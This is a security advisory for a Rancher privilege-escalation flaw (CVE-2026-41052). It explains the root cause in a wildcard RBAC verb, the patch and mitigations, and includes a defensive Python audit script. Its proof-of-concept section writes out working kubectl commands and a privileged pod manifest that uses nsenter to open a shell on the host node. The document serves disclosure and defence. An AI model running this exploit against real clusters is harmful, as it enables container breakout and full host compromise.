critical · 8.4 · CVE-2026-41052 · Jul 1, 2026

CVE-2026-41052: Rancher Project Owner Privilege Escalation to Host

Shubham Kandhare
Security Engagement Manager, SecureLayer7

A Rancher user with Project Owner access can relabel a namespace to use the 'privileged' Pod Security Admission profile, then deploy containers that break out of standard isolation and reach host-leve

Package: github.com/rancher/rancher
Ecosystem: go
Affected: >= 2.14.0, < 2.14.2
Fixed in: 2.14.2

The problem

The built-in `project-owner` RoleTemplate granted a wildcard `*` verb on `management.cattle.io/projects`. That wildcard silently included the custom `updatepsa` verb, which Rancher's admission webhook uses to gate Pod Security Admission label changes on namespaces.

A user with only Cluster Member access who also owns a project therefore already passed the webhook's `updatepsa` check. They could flip a namespace in that project to the `privileged` PSA profile and then deploy workloads that disable every container security boundary PSA would otherwise enforce. The result is container breakout and full host access on any node that schedules the workload.

Proof of concept

A working proof-of-concept for CVE-2026-41052 in github.com/rancher/rancher, with the exact payload below.

```bash
# Step 1 – relabel the namespace to privileged PSA.
# Rancher's admission webhook intercepts this update and only lets it through
# if the caller holds the updatepsa verb on the project, which project-owner had via *.
kubectl label namespace <your-namespace> \
  pod-security.kubernetes.io/enforce=privileged \
  pod-security.kubernetes.io/enforce-version=latest \
  pod-security.kubernetes.io/warn=privileged \
  pod-security.kubernetes.io/audit=privileged \
  --overwrite

# Step 2 – deploy a privileged pod that enters the host's mount namespace.
# hostPID makes the node's PID 1 visible as /proc/1, so nsenter lands in the host root filesystem.
kubectl apply -f - <<EOF
apiVersion: v1
kind: Pod
metadata:
  name: priv-escape
  namespace: <your-namespace>
spec:
  hostPID: true
  hostNetwork: true
  containers:
  - name: shell
    image: alpine
    command: ["nsenter", "--mount=/proc/1/ns/mnt", "--", "/bin/sh"]
    securityContext:
      privileged: true
    stdin: true
    tty: true
EOF

# Step 3 – attach to the interactive shell, which now runs on the host.
kubectl attach -it priv-escape -n <your-namespace>
```

The root cause is the wildcard `verbs: ["*"]` in the built-in `project-owner` RoleTemplate for the `projects` resource in the `management.cattle.io` API group. Rancher's webhook checks for the `updatepsa` verb before allowing PSA label mutations on namespaces, but because `*` matches every verb, project owners already had that permission implicitly, bypassing the intended access control gate.

The patch (PR #55061, commit 2800aaac) replaced `"*"` with an explicit allowlist: `get`, `update`, `delete`, `patch`, `create`, `list`, `watch`, `deletecollection`. That list intentionally omits `updatepsa`, so the webhook check now correctly denies the label mutation for project owners.

This maps to CWE-305 (Authentication Bypass by Primary Weakness) and the MITRE ATT&CK techniques T1611 (Escape to Host) and T1068 (Exploitation for Privilege Escalation).

The fix

Upgrade to Rancher v2.12.10, v2.13.6, or v2.14.2. If an immediate upgrade is not possible, replace the built-in `project-owner` role with a custom RoleTemplate that sets verbs for `management.cattle.io/projects` to the explicit list `[get, update, delete, patch, create, list, watch, deletecollection]` and omits `*` and `updatepsa`.

Any existing wildcard-based project-owner bindings must be re-created against the restricted role.
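The two paragraphs above describe the same access-control gate from both sides: a wildcard verb satisfies any verb check, including Rancher's custom `updatepsa`, and the fix is an explicit allowlist that leaves `updatepsa` out. The following script is an added example, not Rancher's code or its webhook: it reproduces the RBAC verb-matching rule that caused the bug and audits RoleTemplates for any rule that still grants `updatepsa` on `management.cattle.io/projects`. It assumes the JSON shape of `kubectl get roletemplates -o json`; the two sample RoleTemplates and the `project-owner-restricted` name are constructed for the example.

```python
"""Audit Rancher RoleTemplates for implicit `updatepsa` on management.cattle.io/projects.

Added example, not Rancher's own code. Input is the JSON document shape that
`kubectl get roletemplates -o json` returns; the sample below is constructed.
"""
import json

API_GROUP = "management.cattle.io"
RESOURCE = "projects"
GATED_VERB = "updatepsa"  # custom verb Rancher's webhook checks before PSA label changes

# Explicit allowlist the patch uses for project-owner on projects (from the advisory).
PATCHED_VERBS = ["get", "update", "delete", "patch", "create", "list", "watch", "deletecollection"]

# Constructed sample: a cluster that still has the wildcard rule on the built-in
# project-owner template, plus a hypothetical hardened custom copy.
SAMPLE_ROLETEMPLATES = json.dumps({
    "apiVersion": "v1",
    "kind": "List",
    "items": [
        {
            "apiVersion": "management.cattle.io/v3",
            "kind": "RoleTemplate",
            "metadata": {"name": "project-owner"},
            "builtin": True,
            "context": "project",
            "rules": [
                {"apiGroups": [API_GROUP], "resources": [RESOURCE], "verbs": ["*"]},
                {"apiGroups": [""], "resources": ["namespaces"], "verbs": ["get", "list", "watch"]},
            ],
        },
        {
            "apiVersion": "management.cattle.io/v3",
            "kind": "RoleTemplate",
            "metadata": {"name": "project-owner-restricted"},  # hypothetical custom role name
            "builtin": False,
            "context": "project",
            "rules": [
                {"apiGroups": [API_GROUP], "resources": [RESOURCE], "verbs": PATCHED_VERBS},
            ],
        },
    ],
})


def _matches(patterns, value):
    """Kubernetes RBAC matching: '*' matches anything, otherwise exact string match.

    This is exactly why a wildcard verb silently covers a custom verb such as updatepsa.
    """
    return "*" in patterns or value in patterns


def rule_permits(rule, group, resource, verb):
    """True if a single PolicyRule grants `verb` on `group`/`resource`."""
    return (_matches(rule.get("apiGroups", []), group)
            and _matches(rule.get("resources", []), resource)
            and _matches(rule.get("verbs", []), verb))


def template_permits(template, group, resource, verb):
    """True if any rule in the RoleTemplate grants the verb."""
    return any(rule_permits(r, group, resource, verb) for r in template.get("rules", []))


def audit(roletemplates_json):
    """Return the names of RoleTemplates that grant updatepsa on projects, implicitly or not."""
    doc = json.loads(roletemplates_json)
    return [tpl["metadata"]["name"]
            for tpl in doc.get("items", [])
            if template_permits(tpl, API_GROUP, RESOURCE, GATED_VERB)]


def hardened_rule():
    """The replacement rule for the interim custom RoleTemplate: no '*', no updatepsa."""
    return {"apiGroups": [API_GROUP], "resources": [RESOURCE], "verbs": list(PATCHED_VERBS)}


if __name__ == "__main__":
    # On a live cluster: kubectl get roletemplates -o json | python3 audit_updatepsa.py
    print("RoleTemplates granting updatepsa on projects:", audit(SAMPLE_ROLETEMPLATES))
```

Run it against real output by piping `kubectl get roletemplates -o json` into `audit()`; every name it returns is a role whose holders can still relabel namespaces to `privileged`, and custom templates copied from the old `project-owner` are the ones most likely to carry the wildcard. The check deliberately treats `*` in `apiGroups` and `resources` the same way as in `verbs`, since a wildcard in any of the three positions widens the grant.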

Reported by MMunier and Trolldemorted.

